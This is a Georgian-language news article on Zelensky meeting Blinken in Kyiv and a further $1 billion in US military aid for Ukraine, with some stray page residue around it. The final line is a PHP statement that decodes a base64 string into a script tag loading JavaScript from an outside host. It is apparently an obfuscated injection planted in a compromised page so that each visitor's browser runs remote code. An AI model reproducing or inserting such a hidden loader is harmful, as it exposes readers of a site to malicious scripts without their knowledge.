celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი კიევში ვიზიტით ჩასულ აშშ-ის სახელმწიფო მდივანს, ენტონი ბლინკენს შეხვდა. ზელენსკიმ ბლინკენის ვიზიტს და აშშ-ის მხარდაჭერას მნიშვნელოვანი სიგნალი და იმის გარანტია უწოდა, რომ უკრაინას შეუძლია თავისი დროებით ოკუპირებული ტერიტორიების დაბრუნება.
 
„თქვენი გუნდის ვიზიტი ჩვენთვის მნიშვნელოვანი გზავნილია და უკრაინის იმ ლიდერული მხარდაჭერის დადასტურებაა, რომელიც დღეს არსებობს მსოფლიოს სახელმწიფოებს შორის ჩვენი თავისუფლებისთვის, დემოკრატიისთვის, ხალხისთვის, ჩვენი მიწისთვის ომში აგრესორი რუსეთის წინააღმდეგ. ჩვენ მადლობლები ვართ ამ სიგნალის, იმ დიდი მხარდაჭერის, რომელსაც ყოველდღიურად გვიწევთ. ჩვენთვის ეს არის გარანტია, რომ შეგვიძლია ჩვენი ტერიტორიების დაბრუნება“, – განაცხადა ზელენსკიმ.
 
თავის მხრივ აშშ-ის სახელმწიფო მდივანმა, ენტონი ბლინკენმა დღეს ვაშინგტონის მიერ უკრაინისა და კიდევ 18 ქვეყნისთვის გამოცხადებული სამხედრო დახმარების შესახებ ისაუბრა.
 
„ჩვენ ვაცნობეთ კონგრესს, რომ ვგეგმავთ უკრაინისთვის დამატებით ერთი მილიარდი დოლარის გამოყოფას უცხოური სამხედრო დახმარების სახით. ეს არის გრძელვადიანი დახმარება. ჩვენ ასევე დამატებით ერთ მილიარდ დოლარს გამოვყოფთ ევროპელი მოკავშირეებისთვის და პარტნიორებისთვის, რომლებიც ბევრს აკეთებენ უკრაინის მხარდასაჭერად“, – აღნიშნა ბლინკენმა.
463
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");